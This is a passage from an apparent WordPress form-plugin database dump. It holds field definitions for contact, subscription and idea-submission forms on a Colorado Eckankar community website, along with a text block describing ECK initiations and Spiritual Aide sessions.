Title'),(8369,86,'field_key','textbox_256','field_key','textbox_256'),(8370,86,'custom_name_attribute','','custom_name_attribute',''),(8371,86,'personally_identifiable','','personally_identifiable',''),(8372,86,'value','','value',''),(8373,87,'field_label','Enter The Details of Your Idea','field_label','Enter The Details of Your Idea'),(8374,87,'field_key','textarea_253','field_key','textarea_253'),(8375,87,'value','','value',''),(8376,88,'field_label','Why Should It Be Done (what is the spiritual purpose?)','field_label','Why Should It Be Done (what is the spiritual purpose?)'),(8377,88,'field_key','textbox_257','field_key','textbox_257'),(8378,88,'custom_name_attribute','','custom_name_attribute',''),(8379,88,'personally_identifiable','','personally_identifiable',''),(8380,88,'value','','value',''),(8381,89,'field_label','Who Will Do It (you or someone else?)','field_label','Who Will Do It (you or someone else?)'),(8382,89,'field_key','textbox_258','field_key','textbox_258'),(8383,89,'custom_name_attribute','','custom_name_attribute',''),(8384,89,'personally_identifiable','','personally_identifiable',''),(8385,89,'value','','value',''),(8386,90,'field_label','How Many People Will Be Required To Make This Happen?','field_label','How Many People Will Be Required To Make This Happen?'),(8387,90,'field_key','textbox_259','field_key','textbox_259'),(8388,90,'custom_name_attribute','','custom_name_attribute',''),(8389,90,'personally_identifiable','','personally_identifiable',''),(8390,90,'value','','value',''),(8391,91,'field_label','When Would This Happen?','field_label','When Would This Happen?'),(8392,91,'field_key','textbox_263','field_key','textbox_263'),(8393,91,'custom_name_attribute','','custom_name_attribute',''),(8394,91,'personally_identifiable','','personally_identifiable',''),(8395,91,'value','','value',''),(8396,92,'field_label','Where Would This Happen?','field_label','Where Would This Happen?'),(8397,92,'field_key','textbox_264','field_key','textbox_264'),(8398,92,'custom_name_attribute','','custom_name_attribute',''),(8399,92,'personally_identifiable','','personally_identifiable',''),(8400,92,'value','','value',''),(8401,93,'field_label','What Is The Anticipated Cost To Implement This Idea?','field_label','What Is The Anticipated Cost To Implement This Idea?'),(8402,93,'field_key','textbox_265','field_key','textbox_265'),(8403,93,'custom_name_attribute','','custom_name_attribute',''),(8404,93,'personally_identifiable','','personally_identifiable',''),(8405,93,'value','','value',''),(17565,631,'editActive','','editActive',''),(17564,630,'drawerDisabled','','drawerDisabled',''),(8408,95,'field_label','Submit','field_label','Submit'),(8409,95,'field_key','submit_255','field_key','submit_255'),(8417,97,'value','','value',''),(8418,98,'field_label','Last Name','field_label','Last Name'),(8419,98,'field_key','lastname_8','field_key','lastname_8'),(8420,98,'custom_name_attribute','lname','custom_name_attribute','lname'),(8421,98,'personally_identifiable','1','personally_identifiable','1'),(8422,98,'value','','value',''),(8423,99,'field_label','Email','field_label','Email'),(8424,99,'field_key','email_10','field_key','email_10'),(8425,99,'custom_name_attribute','email','custom_name_attribute','email'),(8426,99,'personally_identifiable','1','personally_identifiable','1'),(8427,99,'value','','value',''),(8428,100,'field_label','Phone','field_label','Phone'),(8429,100,'field_key','phone_9','field_key','phone_9'),(8430,100,'custom_name_attribute','phone','custom_name_attribute','phone'),(8431,100,'personally_identifiable','1','personally_identifiable','1'),(8432,100,'value','','value',''),(8433,101,'field_label','Your Local Area','field_label','Your Local Area'),(8434,101,'field_key','listselect_11','field_key','listselect_11'),(8435,102,'field_label','hr','field_label','hr'),(8436,102,'field_key','hr_13','field_key','hr_13'),(8437,103,'field_label','Colorado Leadership Positions','field_label','Colorado Leadership Positions'),(8438,103,'field_key','html_14','field_key','html_14'),(8439,104,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8440,104,'field_key','listselect_15','field_key','listselect_15'),(8441,105,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8442,105,'field_key','textarea_16','field_key','textarea_16'),(8443,105,'value','','value',''),(17554,629,'drawerDisabled','','drawerDisabled',''),(17555,630,'editActive','','editActive',''),(17553,629,'key','html_1663800483443','key','html_1663800483443'),(8446,107,'field_label','Submit','field_label','Submit'),(8447,107,'field_key','submit_12','field_key','submit_12'),(8468,116,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8469,116,'field_key','listselect_125','field_key','listselect_125'),(8470,117,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8471,117,'field_key','textarea_126','field_key','textarea_126'),(8472,117,'value','','value',''),(17538,628,'label','HTML','label','HTML'),(17539,628,'type','html','type','html'),(17537,628,'idAttribute','id','idAttribute','id'),(8475,119,'field_label','Submit','field_label','Submit'),(8476,119,'field_key','submit_128','field_key','submit_128'),(8488,122,'personally_identifiable','1','personally_identifiable','1'),(8489,122,'value','','value',''),(8490,123,'field_label','Email','field_label','Email'),(8491,123,'field_key','email_35','field_key','email_35'),(8492,123,'custom_name_attribute','email','custom_name_attribute','email'),(8493,123,'personally_identifiable','1','personally_identifiable','1'),(8494,123,'value','','value',''),(8495,124,'field_label','Phone','field_label','Phone'),(8496,124,'field_key','phone_36','field_key','phone_36'),(8497,124,'custom_name_attribute','phone','custom_name_attribute','phone'),(8498,124,'personally_identifiable','1','personally_identifiable','1'),(8499,124,'value','','value',''),(8500,125,'field_label','Your Local Area','field_label','Your Local Area'),(8501,125,'field_key','listselect_37','field_key','listselect_37'),(8502,126,'field_label','hr','field_label','hr'),(8503,126,'field_key','hr_38','field_key','hr_38'),(8504,127,'field_label','Colorado Springs Leadership Positions','field_label','Colorado Springs Leadership Positions'),(8505,127,'field_key','html_39','field_key','html_39'),(8506,128,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8507,128,'field_key','listselect_40','field_key','listselect_40'),(8508,129,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8509,129,'field_key','textarea_41','field_key','textarea_41'),(8510,129,'value','','value',''),(17528,627,'label','HTML','label','HTML'),(17529,627,'type','html','type','html'),(17527,627,'idAttribute','id','idAttribute','id'),(8513,131,'field_label','Submit','field_label','Submit'),(8514,131,'field_key','submit_43','field_key','submit_43'),(8528,133,'personally_identifiable','','personally_identifiable',''),(8529,133,'value','','value',''),(8530,134,'editActive','','editActive',''),(8531,134,'field_label','Last Name','field_label','Last Name'),(8532,134,'field_key','lastname_269','field_key','lastname_269'),(8533,134,'default','','default',''),(8534,134,'container_class','one-third','container_class','one-third'),(8535,134,'custom_name_attribute','lname','custom_name_attribute','lname'),(8536,134,'personally_identifiable','1','personally_identifiable','1'),(8537,134,'value','','value',''),(8538,135,'editActive','','editActive',''),(8539,135,'field_label','Email','field_label','Email'),(8540,135,'field_key','email_270','field_key','email_270'),(8541,135,'default','','default',''),(8542,135,'container_class','one-third','container_class','one-third'),(8543,135,'custom_name_attribute','email','custom_name_attribute','email'),(8544,135,'personally_identifiable','1','personally_identifiable','1'),(8545,135,'value','','value',''),(8546,136,'editActive','','editActive',''),(8547,136,'field_label','hr','field_label','hr'),(8548,136,'field_key','hr_273','field_key','hr_273'),(8549,136,'container_class','','container_class',''),(8550,137,'editActive','','editActive',''),(8551,137,'field_label','Message Subject','field_label','Message Subject'),(8552,137,'field_key','textbox_303','field_key','textbox_303'),(8553,137,'default','','default',''),(8554,137,'container_class','one-half first','container_class','one-half first'),(8555,137,'manual_key','','manual_key',''),(8556,137,'custom_mask','','custom_mask',''),(8557,137,'custom_name_attribute','','custom_name_attribute',''),(8558,137,'personally_identifiable','','personally_identifiable',''),(8559,137,'value','','value',''),(8560,138,'editActive','','editActive',''),(8561,138,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8562,138,'field_key','textarea_276','field_key','textarea_276'),(8563,138,'placeholder','','placeholder',''),(8564,138,'container_class','','container_class',''),(8565,138,'manual_key','','manual_key',''),(8566,138,'value','','value',''),(8567,139,'editActive','','editActive',''),(8568,139,'field_label','Text','field_label','Text'),(8569,139,'field_key','html_305','field_key','html_305'),(8570,139,'container_class','','container_class',''),(17521,626,'container_class','','container_class',''),(8577,141,'editActive','','editActive',''),(8578,141,'field_label','Submit','field_label','Submit'),(8579,141,'field_key','submit_278','field_key','submit_278'),(8580,141,'container_class','','container_class',''),(8581,142,'field_label','HTML','field_label','HTML'),(8582,142,'field_key','html_1515012877904','field_key','html_1515012877904'),(8583,143,'field_label','First Name','field_label','First Name'),(8584,143,'field_key','firstname_1515012036721','field_key','firstname_1515012036721'),(8585,143,'custom_name_attribute','fname','custom_name_attribute','fname'),(8586,143,'personally_identifiable','1','personally_identifiable','1'),(8587,143,'value','','value',''),(8588,144,'field_label','Last Name','field_label','Last Name'),(8589,144,'field_key','lastname_1515012040393','field_key','lastname_1515012040393'),(8590,144,'custom_name_attribute','lname','custom_name_attribute','lname'),(8591,144,'personally_identifiable','1','personally_identifiable','1'),(8592,144,'value','','value',''),(8593,145,'field_label','Email','field_label','Email'),(8594,145,'field_key','email_1515012046399','field_key','email_1515012046399'),(8595,145,'custom_name_attribute','email','custom_name_attribute','email'),(8596,145,'personally_identifiable','1','personally_identifiable','1'),(8597,145,'value','','value',''),(8598,146,'field_label','Phone','field_label','Phone'),(8599,146,'field_key','phone_1515012055554','field_key','phone_1515012055554'),(8600,146,'custom_name_attribute','phone','custom_name_attribute','phone'),(8601,146,'personally_identifiable','1','personally_identifiable','1'),(8602,146,'value','','value',''),(8603,147,'field_label','Your Local Area','field_label','Your Local Area'),(8604,147,'field_key','your_local_area_1515013258725','field_key','your_local_area_1515013258725'),(12165,379,'first_name','0','first_name','0'),(12146,378,'desc_pos','none','desc_pos','none'),(8609,150,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8610,150,'field_key','select_the_person_you_would_like_to_email_1515013520503','field_key','select_the_person_you_would_like_to_email_1515013520503'),(8611,151,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8612,151,'field_key','enter_your_message_here_1515013766874','field_key','enter_your_message_here_1515013766874'),(8613,151,'value','','value',''),(8616,153,'field_label','Submit','field_label','Submit'),(8617,153,'field_key','submit_1515013824829','field_key','submit_1515013824829'),(8627,156,'custom_name_attribute','lname','custom_name_attribute','lname'),(8628,156,'personally_identifiable','1','personally_identifiable','1'),(8629,156,'value','','value',''),(8630,157,'field_label','Email','field_label','Email'),(8631,157,'field_key','email_132','field_key','email_132'),(8632,157,'custom_name_attribute','email','custom_name_attribute','email'),(8633,157,'personally_identifiable','1','personally_identifiable','1'),(8634,157,'value','','value',''),(8635,158,'field_label','Phone','field_label','Phone'),(8636,158,'field_key','phone_133','field_key','phone_133'),(8637,158,'custom_name_attribute','phone','custom_name_attribute','phone'),(8638,158,'personally_identifiable','1','personally_identifiable','1'),(8639,158,'value','','value',''),(8640,159,'field_label','Your Local Area','field_label','Your Local Area'),(8641,159,'field_key','listselect_134','field_key','listselect_134'),(12145,378,'show_desc','0','show_desc','0'),(8646,162,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8647,162,'field_key','listselect_137','field_key','listselect_137'),(8648,163,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8649,163,'field_key','textarea_138','field_key','textarea_138'),(8650,163,'value','','value',''),(8653,165,'field_label','Submit','field_label','Submit'),(8654,165,'field_key','submit_140','field_key','submit_140'),(8664,168,'field_key','lastname_46','field_key','lastname_46'),(8665,168,'custom_name_attribute','lname','custom_name_attribute','lname'),(8666,168,'personally_identifiable','1','personally_identifiable','1'),(8667,168,'value','','value',''),(8668,169,'field_label','Email','field_label','Email'),(8669,169,'field_key','email_47','field_key','email_47'),(8670,169,'custom_name_attribute','email','custom_name_attribute','email'),(8671,169,'personally_identifiable','1','personally_identifiable','1'),(8672,169,'value','','value',''),(8673,170,'field_label','Phone','field_label','Phone'),(8674,170,'field_key','phone_48','field_key','phone_48'),(8675,170,'custom_name_attribute','phone','custom_name_attribute','phone'),(8676,170,'personally_identifiable','1','personally_identifiable','1'),(8677,170,'value','','value',''),(8678,171,'field_label','Your Local Area','field_label','Your Local Area'),(8679,171,'field_key','listselect_49','field_key','listselect_49'),(8680,172,'field_label','hr','field_label','hr'),(8681,172,'field_key','hr_50','field_key','hr_50'),(8682,173,'field_label','Loveland Leadership Positions','field_label','Loveland Leadership Positions'),(8683,173,'field_key','html_51','field_key','html_51'),(8684,174,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8685,174,'field_key','listselect_52','field_key','listselect_52'),(8686,175,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8687,175,'field_key','textarea_53','field_key','textarea_53'),(8688,175,'value','','value',''),(17479,622,'type','html','type','html'),(17480,622,'label','HTML','label','HTML'),(17478,622,'idAttribute','id','idAttribute','id'),(8691,177,'field_label','Submit','field_label','Submit'),(8692,177,'field_key','submit_55','field_key','submit_55'),(8704,182,'field_label','US States','field_label','US States'),(8705,182,'field_key','liststate_1550094094681','field_key','liststate_1550094094681'),(8706,183,'field_label','Country','field_label','Country'),(8707,183,'field_key','listcountry_1550094096365','field_key','listcountry_1550094096365'),(8708,183,'value','US','value','US'),(8709,184,'field_label','Choose your subscription(s)','field_label','Choose your subscription(s)'),(8710,184,'field_key','choose_your_subscription_s_1550099095640','field_key','choose_your_subscription_s_1550099095640'),(17624,637,'editActive','','editActive',''),(17625,637,'order','9','order','9'),(17623,636,'drawerDisabled','','drawerDisabled',''),(17622,636,'key','html_1663800683276','key','html_1663800683276'),(8713,186,'field_label','Submit','field_label','Submit'),(8714,186,'field_key','submit_1550094251707','field_key','submit_1550094251707'),(8781,207,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8782,207,'field_key','listselect_161','field_key','listselect_161'),(8783,208,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8784,208,'field_key','textarea_162','field_key','textarea_162'),(8785,208,'value','','value',''),(17440,618,'type','html','type','html'),(17441,618,'label','HTML','label','HTML'),(17439,618,'idAttribute','id','idAttribute','id'),(8788,210,'field_label','Submit','field_label','Submit'),(8789,210,'field_key','submit_164','field_key','submit_164'),(8799,213,'custom_name_attribute','lname','custom_name_attribute','lname'),(8800,213,'personally_identifiable','1','personally_identifiable','1'),(8801,213,'value','','value',''),(8802,214,'field_label','Email','field_label','Email'),(8803,214,'field_key','email_168','field_key','email_168'),(8804,214,'custom_name_attribute','email','custom_name_attribute','email'),(8805,214,'personally_identifiable','1','personally_identifiable','1'),(8806,214,'value','','value',''),(8807,215,'field_label','Phone','field_label','Phone'),(8808,215,'field_key','phone_169','field_key','phone_169'),(8809,215,'custom_name_attribute','phone','custom_name_attribute','phone'),(8810,215,'personally_identifiable','1','personally_identifiable','1'),(8811,215,'value','','value',''),(8812,216,'field_label','Your Local Area','field_label','Your Local Area'),(8813,216,'field_key','listselect_170','field_key','listselect_170'),(12231,380,'input_limit_msg','','input_limit_msg',''),(8818,219,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8819,219,'field_key','listselect_173','field_key','listselect_173'),(8820,220,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8821,220,'field_key','textarea_174','field_key','textarea_174'),(8822,220,'value','','value',''),(17430,617,'label','HTML','label','HTML'),(17431,617,'type','html','type','html'),(17429,617,'idAttribute','id','idAttribute','id'),(8825,222,'field_label','Submit','field_label','Submit'),(8826,222,'field_key','submit_176','field_key','submit_176'),(8839,227,'field_key','listselect_316','field_key','listselect_316'),(8840,228,'field_label','Country','field_label','Country'),(8841,228,'field_key','listcountry_317','field_key','listcountry_317'),(8842,228,'value','US','value','US'),(8843,229,'field_label','Choose your subscription(s) - <span style=\"font-size:12px\"><i> (Hold CTRL key for multiple selections)</i></span>','field_label','Choose your subscription(s) - <span style=\"font-size:12px\"><i> (Hold CTRL key for multiple selections)</i></span>'),(8844,229,'field_key','listmultiselect_318','field_key','listmultiselect_318'),(8845,230,'field_label','Text','field_label','Text'),(8846,230,'field_key','html_313','field_key','html_313'),(8849,232,'field_label','Submit','field_label','Submit'),(8850,232,'field_key','submit_315','field_key','submit_315'),(8907,249,'custom_name_attribute','phone','custom_name_attribute','phone'),(8908,249,'personally_identifiable','1','personally_identifiable','1'),(8909,249,'value','','value',''),(8910,250,'field_label','Your Local Area','field_label','Your Local Area'),(8911,250,'field_key','listselect_194','field_key','listselect_194'),(8916,253,'field_label','Select the person you would like to email','field_label','Select the person you would like to email'),(8917,253,'field_key','listselect_197','field_key','listselect_197'),(8918,254,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(8919,254,'field_key','textarea_198','field_key','textarea_198'),(8920,254,'value','','value',''),(17394,613,'default','','default',''),(17395,613,'container_class','','container_class',''),(17393,613,'label','HTML','label','HTML'),(8923,256,'field_label','Submit','field_label','Submit'),(8924,256,'field_key','submit_200','field_key','submit_200'),(8935,259,'custom_name_attribute','lname','custom_name_attribute','lname'),(8936,259,'personally_identifiable','1','personally_identifiable','1'),(8937,259,'value','','value',''),(8938,260,'field_label','Email','field_label','Email'),(8939,260,'field_key','email_223','field_key','email_223'),(8940,260,'custom_name_attribute','email','custom_name_attribute','email'),(8941,260,'personally_identifiable','1','personally_identifiable','1'),(8942,260,'value','','value',''),(8943,261,'field_label','Phone','field_label','Phone'),(8944,261,'field_key','phone_224','field_key','phone_224'),(8945,261,'custom_name_attribute','phone','custom_name_attribute','phone'),(8946,261,'personally_identifiable','1','personally_identifiable','1'),(8947,261,'value','','value',''),(8948,262,'field_label','Your Local Area','field_label','Your Local Area'),(8949,262,'field_key','listselect_225','field_key','listselect_225'),(8950,263,'field_label','hr','field_label','hr'),(8951,263,'field_key','hr_226','field_key','hr_226'),(8952,264,'field_label','Service Opportunities','field_label','Service Opportunities'),(8953,264,'field_key','html_227','field_key','html_227'),(8954,265,'field_label','Book Discussions','field_label','Book Discussions'),(8955,265,'field_key','listmultiselect_228','field_key','listmultiselect_228'),(8956,266,'field_label','Community HU','field_label','Community HU'),(8957,266,'field_key','listmultiselect_232','field_key','listmultiselect_232'),(8958,267,'field_label','ECK Worship Service','field_label','ECK Worship Service'),(8959,267,'field_key','listmultiselect_233','field_key','listmultiselect_233'),(8960,268,'field_label','Email Newsletter Help','field_label','Email Newsletter Help'),(8961,268,'field_key','listmultiselect_234','field_key','listmultiselect_234'),(8962,269,'field_label','Round Tables','field_label','Round Tables'),(8963,269,'field_key','listmultiselect_235','field_key','listmultiselect_235'),(8964,270,'field_label','Satsangs','field_label','Satsangs'),(8965,270,'field_key','listmultiselect_236','field_key','listmultiselect_236'),(8966,271,'field_label','Vahana','field_label','Vahana'),(8967,271,'field_key','listmultiselect_237','field_key','listmultiselect_237'),(8968,272,'field_label','Message (optional)','field_label','Message (optional)'),(8969,272,'field_key','textarea_229','field_key','textarea_229'),(8970,272,'value','','value',''),(17373,611,'type','html','type','html'),(17374,611,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17372,611,'label','HTML','label','HTML'),(8973,274,'field_label','Submit','field_label','Submit'),(8974,274,'field_key','submit_231','field_key','submit_231'),(9010,280,'editActive','','editActive',''),(9011,280,'field_label','Message Subject','field_label','Message Subject'),(9012,280,'field_key','textbox_326','field_key','textbox_326'),(9013,280,'default','','default',''),(9014,280,'container_class','','container_class',''),(9015,280,'manual_key','','manual_key',''),(9016,280,'custom_mask','','custom_mask',''),(9017,280,'custom_name_attribute','','custom_name_attribute',''),(9018,280,'personally_identifiable','','personally_identifiable',''),(9019,280,'value','','value',''),(9020,281,'editActive','','editActive',''),(9021,281,'field_label','Enter Your Message Here','field_label','Enter Your Message Here'),(9022,281,'field_key','textarea_327','field_key','textarea_327'),(9023,281,'placeholder','','placeholder',''),(9024,281,'container_class','','container_class',''),(9025,281,'manual_key','','manual_key',''),(9026,281,'value','','value',''),(9027,282,'editActive','','editActive',''),(9028,282,'field_label','Text','field_label','Text'),(9029,282,'field_key','html_328','field_key','html_328'),(9030,282,'container_class','','container_class',''),(17358,609,'drawerDisabled','','drawerDisabled',''),(17359,16,'drawerDisabled','','drawerDisabled',''),(17357,609,'key','html_1663797373767','key','html_1663797373767'),(17356,609,'element_class','','element_class',''),(17355,609,'container_class','','container_class',''),(9037,284,'editActive','','editActive',''),(9038,284,'field_label','Submit','field_label','Submit'),(9039,284,'field_key','submit_330','field_key','submit_330'),(9040,284,'container_class','','container_class',''),(17029,599,'field_label','Text','field_label','Text'),(9043,51,'drawerDisabled','','drawerDisabled',''),(9052,285,'field_label','Text','field_label','Text'),(9053,285,'field_key','html_93','field_key','html_93'),(9054,285,'objectType','Field','objectType','Field'),(9055,285,'objectDomain','fields','objectDomain','fields'),(9056,285,'editActive','','editActive',''),(9057,285,'order','1','order','1'),(9058,285,'type','html','type','html'),(9059,285,'label','Text','label','Text'),(9060,285,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(9061,285,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Boulder Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.'),(9062,285,'desc_el','div','desc_el','div'),(9063,285,'show_desc','0','show_desc','0'),(9064,285,'desc_pos','none','desc_pos','none'),(9065,285,'desc_text','','desc_text',''),(9066,285,'element_class','','element_class',''),(9067,285,'default','<p></p>\n<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong>Central Colorado Initiator and ESA\'s</strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p>\n<p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>','default','<p></p>\n<p></p>\n<p></p>\n<h3><span style=\"color: #23507d;\"><strong>Central Colorado Initiator and ESA\'s</strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.<p></p>\n<p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal guidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained to offer this assistance. There are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy. If you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>'),(9068,285,'key','html_93','key','html_93'),(9069,285,'container_class','','container_class',''),(9070,285,'drawerDisabled','','drawerDisabled',''),(9071,285,'parent_id','6','parent_id','6'),(9072,286,'field_label','First Name','field_label','First Name'),(9073,286,'field_key','textbox_94','field_key','textbox_94'),(9074,286,'value','','value',''),(9075,286,'objectType','Field','objectType','Field'),(9076,286,'objectDomain','fields','objectDomain','fields'),(9077,286,'editActive','','editActive',''),(9078,286,'order','2','order','2'),(9079,286,'type','textbox','type','textbox'),(9080,286,'def_id','6','def_id','6'),(9081,286,'label','First Name','label','First Name'),(9082,286,'label_pos','above','label_pos','above'),(9083,286,'mask','','mask',''),(9084,286,'datepicker','0','datepicker','0'),(9085,286,'first_name','1','first_name','1'),(9086,286,'last_name','0','last_name','0'),(9087,286,'from_name','0','from_name','0'),(9088,286,'user_info_field_group','1','user_info_field_group','1'),(9089,286,'show_help','0','show_help','0'),(9090,286,'help_text','','help_text',''),(9091,286,'calc_auto_include','0','calc_auto_include','0'),(9092,286,'calc_option','0','calc_option','0'),(9093,286,'placeholder','','placeholder',''),(9094,286,'user_address_1','','user_address_1',''),(9095,286,'user_address_2','','user_address_2',''),(9096,286,'user_city','','user_city',''),(9097,286,'user_zip','','user_zip',''),(9098,286,'user_phone','','user_phone',''),(9099,286,'user_email','','user_email',''),(9100,286,'disable_input','0','disable_input','0'),(9101,286,'input_limit','','input_limit',''),(9102,286,'input_limit_type','char','input_limit_type','char'),(9103,286,'input_limit_msg','','input_limit_msg',''),(9104,286,'user_state','0','user_state','0'),(9105,286,'autocomplete_off','0','autocomplete_off','0'),(9106,286,'num_sort','0','num_sort','0'),(9107,286,'admin_label','','admin_label',''),(9108,286,'user_info_field_group_name','','user_info_field_group_name',''),(9109,286,'user_info_field_group_custom','','user_info_field_group_custom',''),(9110,286,'show_desc','0','show_desc','0'),(9111,286,'desc_pos','none','desc_pos','none'),(9112,286,'desc_text','','desc_text',''),(9113,286,'element_class','','element_class',''),(9114,286,'required','1','required','1'),(9115,286,'key','textbox_94','key','textbox_94'),(9116,286,'default','','default',''),(9117,286,'container_class','one-half first','container_class','one-half first'),(9118,286,'manual_key','','manual_key',''),(9119,286,'custom_mask','','custom_mask',''),(9120,286,'custom_name_attribute','','custom_name_attribute',''),(9121,286,'personally_identifiable','','personally_identifiable',''),(9122,286,'parent_id','6','parent_id','6'),(9123,287,'field_label','Last Name','field_label','Last Name'),(9124,287,'field_key','lastname_95','field_key','lastname_95'),(9125,287,'value','','value',''),(9126,287,'objectType','Field','objectType','Field'),(9127,287,'objectDomain','fields','objectDomain','fields'),(9128,287,'editActive','','editActive',''),(9129,287,'order','3','order','3'),(9130,287,'type','lastname','type','lastname'),(9131,287,'def_id','7','def_id','7'),(9132,287,'label','Last Name','label','Last Name'),(9133,287,'label_pos','above','label_pos','above'),(9134,287,'mask','','mask',''),(9135,287,'datepicker','0','datepicker','0'),(9136,287,'first_name','0','first_name','0'),(9137,287,'from_name','0','from_name','0'),(9138,287,'user_info_field_group','1','user_info_field_group','1'),(9139,287,'show_help','0','show_help','0'),(9140,287,'help_text','','help_text',''),(9141,287,'calc_auto_include','0','calc_auto_include','0'),(9142,287,'calc_option','0','calc_option','0'),(9143,287,'placeholder','','placeholder',''),(9144,287,'user_address_1','','user_address_1',''),(9145,287,'user_address_2','','user_address_2',''),(9146,287,'user_city','','user_city',''),(9147,287,'user_zip','','user_zip',''),(9148,287,'user_phone','','user_phone',''),(9149,287,'user_email','','user_email',''),(9150,287,'disable_input','0','disable_input','0'),(9151,287,'input_limit','','input_limit',''),(9152,287,'input_limit_type','char','input_limit_type','char'),(9153,287,'input_limit_msg','','input_limit_msg',''),(9154,287,'user_state','0','user_state','0'),(9155,287,'autocomplete_off','0','autocomplete_off','0'),(9156,287,'num_sort','0','num_sort','0'),(9157,287,'admin_label','','admin_label',''),(9158,287,'user_info_field_group_name','','user_info_field_group_name',''),(9159,287,'user_info_field_group_custom','','user_info_field_group_custom',''),(9160,287,'show_desc','0','show_desc','0'),(9161,287,'desc_pos','none','desc_pos','none'),(9162,287,'desc_text','','desc_text',''),(9163,287,'element_class','','element_class',''),(9164,287,'required','1','required','1'),(9165,287,'key','lastname_95','key','lastname_95'),(9166,287,'default','','default',''),(9167,287,'container_class','one-half','container_class','one-half'),(9168,287,'custom_name_attribute','lname','custom_name_attribute','lname'),(9169,287,'personally_identifiable','1','personally_identifiable','1'),(9170,287,'parent_id','6','parent_id','6'),(9171,288,'field_label','Email','field_label','Email'),(9172,288,'field_key','email_96','field_key','email_96'),(9173,288,'objectType','Field','objectType','Field'),(9174,288,'objectDomain','fields','objectDomain','fields'),(9175,288,'editActive','','editActive',''),(9176,288,'order','4','order','4'),(9177,288,'type','email','type','email'),(9178,288,'def_id','14','def_id','14'),(9179,288,'label','Email','label','Email'),(9180,288,'label_pos','above','label_pos','above'),(9181,288,'mask','','mask',''),(9182,288,'datepicker','0','datepicker','0'),(9183,288,'first_name','0','first_name','0'),(9184,288,'last_name','0','last_name','0'),(9185,288,'from_name','0','from_name','0'),(9186,288,'user_address_1','0','user_address_1','0'),(9187,288,'user_address_2','0','use